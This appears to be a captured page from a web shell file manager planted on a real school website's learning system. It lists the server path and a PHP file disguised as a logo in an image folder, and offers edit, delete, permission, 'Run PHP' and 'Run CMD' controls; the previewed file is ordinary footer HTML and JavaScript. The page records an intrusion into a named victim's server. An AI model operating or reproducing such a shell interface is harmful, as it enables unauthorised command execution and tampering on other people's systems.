๐ File Manager
๐
/
/
home
/
u449181296
/
domains
/
birulogi.smakpbaleendah.sch.id
/
public_html
/
lms
/
tukang-ngatur
/
assets
/
img
/
qr-logos
/home/u449181296/domains/birulogi.smakpbaleendah.sch.id/public_html/lms/tukang-ngatur/assets/img/qr-logos
Upload
Name
Size
Date
CHMOD
Action
โ FILE โ
logo_1773801405.php
6.73 KB
2026-03-18 02:36
644
(rw-r--r--)
Edit
|
Rename
|
Preview
|
Del
๐งช PHP Preview
<footer class="py-12 text-center border-t border-slate-200 dark:border-slate-800 mt-20"> <p class="text-slate-500 dark:text-cyan-400/40 text-sm"> ยฉ 2026 SMA Karya Pembangunan Baleendah | Developed by <strong>birulogi</strong> </p> </footer> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script> <script> // Theme Logic const toggleBtn = document.getElementById('theme-toggle'); const body = document.documentElement; const icon = document.getElementById('theme-icon'); if (localStorage.theme === 'dark' || (!('theme' in localStorage) && window.matchMedia('(prefers-color-scheme: dark)').matches)) { body.classList.add('dark'); body.setAttribute('data-theme', 'dark'); icon.classList.replace('fa-moon', 'fa-sun'); } toggleBtn.addEventListener('click', () => { body.classList.toggle('dark'); const isDark = body.classList.contains('dark'); body.setAttribute('data-theme', isDark ? 'dark' : 'light'); localStorage.theme = isDark ? 'dark' : 'light'; icon.classList.replace(isDark ? 'fa-moon' : 'fa-sun', isDark ? 'fa-sun' : 'fa-moon'); }); // Custom SweetAlert function sweetRedirect(title, url) { Swal.fire({ title: 'Buka Layanan?', text: `Kamu akan diarahkan ke ${title}`, icon: 'info', showCancelButton: true, confirmButtonText: 'Ya, Gas!', cancelButtonText: 'Batal', background: body.classList.contains('dark') ? '#1e293b' : '#fff', color: body.classList.contains('dark') ? '#f1f5f9' : '#1e293b', confirmButtonColor: '#3b82f6' }).then((result) => { if (result.isConfirmed) window.location.href = url; }); } </script> </body> </html>
Run PHP
๐ฅ Linux CMD
Run CMD